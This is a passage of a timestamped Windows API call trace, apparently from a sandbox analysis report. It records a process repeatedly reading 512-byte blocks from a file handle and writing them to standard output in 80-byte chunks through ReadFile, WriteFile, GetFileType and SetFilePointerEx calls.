lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.349] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.349] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.349] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.349] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] GetFileType (hFile=0x50) returned 0x1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] GetFileType (hFile=0x50) returned 0x1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 
[0214.349] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] GetFileType (hFile=0x50) returned 0x1 [0214.349] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.349] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] GetFileType (hFile=0x50) returned 0x1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] GetFileType (hFile=0x50) returned 0x1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] GetFileType (hFile=0x50) returned 0x1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] GetFileType (hFile=0x50) returned 0x1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] WriteFile (in: hFile=0x50, 
lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] GetFileType (hFile=0x50) returned 0x1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.350] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.350] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] GetFileType (hFile=0x50) returned 0x1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] GetFileType (hFile=0x50) returned 0x1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.350] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.350] GetFileType (hFile=0x50) returned 0x1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.351] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0214.351] GetFileType (hFile=0x50) returned 0x1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] GetFileType (hFile=0x50) returned 0x1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] GetFileType (hFile=0x50) returned 0x1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] GetFileType (hFile=0x50) returned 0x1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] GetFileType (hFile=0x50) returned 0x1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.351] _get_osfhandle (_FileHandle=4) returned 0x58 
[0214.351] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.351] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.351] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] GetFileType (hFile=0x50) returned 0x1 [0214.351] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.351] GetFileType (hFile=0x50) returned 0x1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] GetFileType (hFile=0x50) returned 0x1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] GetFileType (hFile=0x50) returned 0x1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] GetFileType (hFile=0x50) returned 0x1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, 
lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] GetFileType (hFile=0x50) returned 0x1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] GetFileType (hFile=0x50) returned 0x1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] GetFileType (hFile=0x50) returned 0x1 [0214.352] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.352] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.353] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.353] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.353] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.353] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] GetFileType (hFile=0x50) returned 0x1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] GetFileType (hFile=0x50) returned 0x1 [0214.353] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] GetFileType (hFile=0x50) returned 0x1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] GetFileType (hFile=0x50) returned 0x1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] GetFileType (hFile=0x50) returned 0x1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.353] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.353] GetFileType (hFile=0x50) returned 0x1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] GetFileType (hFile=0x50) returned 0x1 [0214.354] _get_osfhandle (_FileHandle=1) returned 
0x50 [0214.354] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] GetFileType (hFile=0x50) returned 0x1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.354] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.354] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.354] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.354] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] GetFileType (hFile=0x50) returned 0x1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] GetFileType (hFile=0x50) returned 0x1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] GetFileType (hFile=0x50) returned 0x1 [0214.354] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.354] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) 
returned 1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] GetFileType (hFile=0x50) returned 0x1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] GetFileType (hFile=0x50) returned 0x1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] GetFileType (hFile=0x50) returned 0x1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] GetFileType (hFile=0x50) returned 0x1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] GetFileType (hFile=0x50) returned 0x1 [0214.355] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.355] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.355] _get_osfhandle 
(_FileHandle=4) returned 0x58 [0214.355] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.356] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.356] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] GetFileType (hFile=0x50) returned 0x1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] GetFileType (hFile=0x50) returned 0x1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] GetFileType (hFile=0x50) returned 0x1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] GetFileType (hFile=0x50) returned 0x1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] GetFileType (hFile=0x50) returned 0x1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] GetFileType (hFile=0x50) returned 0x1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] GetFileType (hFile=0x50) returned 0x1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] GetFileType (hFile=0x50) returned 0x1 [0214.356] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.356] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.357] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.357] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.357] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.357] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] GetFileType (hFile=0x50) returned 0x1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] GetFileType 
(hFile=0x50) returned 0x1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] GetFileType (hFile=0x50) returned 0x1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] GetFileType (hFile=0x50) returned 0x1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] WriteFile (in: hFile=0x50, lpBuffer=0x24f21c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f21c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] GetFileType (hFile=0x50) returned 0x1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] WriteFile (in: hFile=0x50, lpBuffer=0x24f26c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f26c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] GetFileType (hFile=0x50) returned 0x1 [0214.357] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.357] WriteFile (in: hFile=0x50, lpBuffer=0x24f2bc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f2bc*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] GetFileType (hFile=0x50) returned 0x1 [0214.358] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] WriteFile (in: hFile=0x50, lpBuffer=0x24f30c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f30c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] GetFileType (hFile=0x50) returned 0x1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] WriteFile (in: hFile=0x50, lpBuffer=0x24f35c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f35c*, lpNumberOfBytesWritten=0x24e360*=0x20, lpOverlapped=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.358] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x24e34c | out: lpNewFilePointer=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=4) returned 0x58 [0214.358] ReadFile (in: hFile=0x58, lpBuffer=0x24f17c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x24e36c, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesRead=0x24e36c*=0x200, lpOverlapped=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] GetFileType (hFile=0x50) returned 0x1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] GetFileType (hFile=0x50) returned 0x1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] WriteFile (in: hFile=0x50, lpBuffer=0x24f17c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f17c*, lpNumberOfBytesWritten=0x24e360*=0x50, lpOverlapped=0x0) returned 1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] GetFileType (hFile=0x50) returned 0x1 [0214.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0214.358] WriteFile (in: hFile=0x50, lpBuffer=0x24f1cc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x24e360, lpOverlapped=0x0 | out: lpBuffer=0x24f1cc*, 
